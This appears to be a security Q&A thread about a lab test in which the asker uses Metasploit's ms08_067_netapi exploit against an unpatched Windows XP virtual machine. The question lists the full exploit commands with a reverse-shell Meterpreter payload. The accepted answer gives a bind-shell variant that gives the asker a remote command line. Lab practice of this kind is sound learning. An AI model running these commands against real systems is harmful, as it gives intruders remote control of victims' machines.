# Use Metasploit to exploit SMB through Conficker

Tags: windows, metasploit, kali-linux, remote-server

I've got an SP0/unpatched Windows XP which is vulnerable to the Conficker worm.
I'm using metasploit to use the Conficker exploit with the purpose of opening a remote shell/command line.

My Metasploit script is the following one:

```
use exploit/windows/smb/ms08_067_netapi
set RHOST <vulnerable_win_xp_ip>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacking_kali_host_ip>
set LPORT <local_port>
exploit -j -z
```

In my case, I have machines with address in `192.168.239.*` and `LPORT = 443`.

In this way, I should be able to open a session with the remote vulnerable machine (`sessions -i 1`), thus executing the command line application (`execute -i -f cmd.exe`) and obtaining a remote command line.

Nevertheless, when I execute the script, although I get Meterpreter opening a session with the victim, this session is closed (Reason: Died) after a few seconds.

I've [found](https://community.rapid7.com/thread/3822) that it could be related to the fact I'm using two VMWare Virtual Machines during my test.
As suggested, I tried with `set InitialAutoRunScript migrate -f`, but nothing changes.

How can I prevent Meterpreter sessions to be closed?
And, most importantly, why are they closed?

Comment: Best advice: try harder

Comment: Your real question seems to be: "why is my meterpreter session closing after a few seconds?" Look at other migration options. And, try harder ;)

Answer (score 1, accepted):

I've solved by varying the payload used by Metasploit.
In particular, using `bind_tcp` payload Meterpreter connections are not closed anymore after a few seconds, and I obtain a remote shell/command line.

```
use windows/smb/ms08_067_netapi
set PAYLOAD windows/shell/bind_tcp
set RHOST <vulnerable_win_xp_ip>
show targets
set TARGET <n>
run
```

In my case `<n> = 2`, but in general it depends from previous step.